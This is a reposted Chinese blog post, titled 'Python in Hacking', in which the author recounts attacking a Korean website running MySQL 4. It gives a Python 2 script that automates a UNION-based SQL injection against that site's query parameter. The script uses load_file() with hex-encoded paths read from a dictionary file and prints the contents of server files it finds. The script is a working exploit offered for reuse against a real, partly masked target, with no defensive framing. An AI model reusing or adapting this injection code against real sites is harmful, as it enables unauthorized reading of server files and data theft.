文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

Python in Hacking[LO

2023-01-31 05:48

关注

Pnig0s p.s: ***一韩国站,遭遇Mysql4,好在有FILE权限只能批量LOAD_FILE路径,为了避免繁重的工作量写了这个脚本,字典文件名为dic.txt路径一行一个,因为环境不同,此脚本并非通用,稍作改动即可。复制代码请务必在普通IE下复制

 

  1. #!/usr/bin/python 
  2. # -*- coding:utf-8 -*- 
  3. ######################################## 
  4. #          Coder:Pnig0s1992 
  5. # A script to auto use the LOAD_FILE()  
  6. #      GTalk:pnigos70@gmail.com  
  7. #Blog:http://pnig0s1992.blog.51cto.com/ 
  8. ######################################## 
  9. import urllib 
  10. import binascii 
  11. import string 
  12. import os 
  13. def guessPath(): 
  14.     fi = open('dic.txt','r+') 
  15.     while True: 
  16.         path = fi.readline().strip() 
  17.         if path: 
  18.             url = 'http://www.xxx.co.kr/?mode=view&no=\ 
  19.             1151 AnD 1=2 UnIon SeleCt 1,2,3,4,5,load_file(0x'+binascii.b2a_hex(str(path))+')' 
  20.             EnUrl=urllib.quote_plus(url,safe=':\'/?&=()|') 
  21.             fd = urllib.urlopen(EnUrl) 
  22.             res = fd.read() 
  23.             Begin = res.rfind('<table width="450" border="0" cellspacing="0" cellpadding="0">') 
  24.             End = res.rfind('<table width="486" border="0" cellspacing="0" cellpadding="0">') 
  25.             tempDate = res[Begin:End] 
  26.             realBegin = tempDate.index('<td>')+4 
  27.             realEnd = tempDate.index('</td>') 
  28.             checkEmpty = tempDate[realBegin:realEnd].strip() 
  29.             if checkEmpty: 
  30.                 print path+' is exists!!!!!!!!!!!' 
  31.                 print 'Geting the data......' 
  32.                 print checkEmpty 
  33.                 os.system('pause') 
  34.             else: 
  35.                 print path+' is not exists.' 
  36.                 continue 
  37.         else: 
  38.             print 'All has finished...' 
  39.             break 
  40.  
  41. if __name__ == '__main__': 
  42.     print '__________Written by Pnig0s1992__________' 
  43.     guessPath() 

 

 

 

 

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯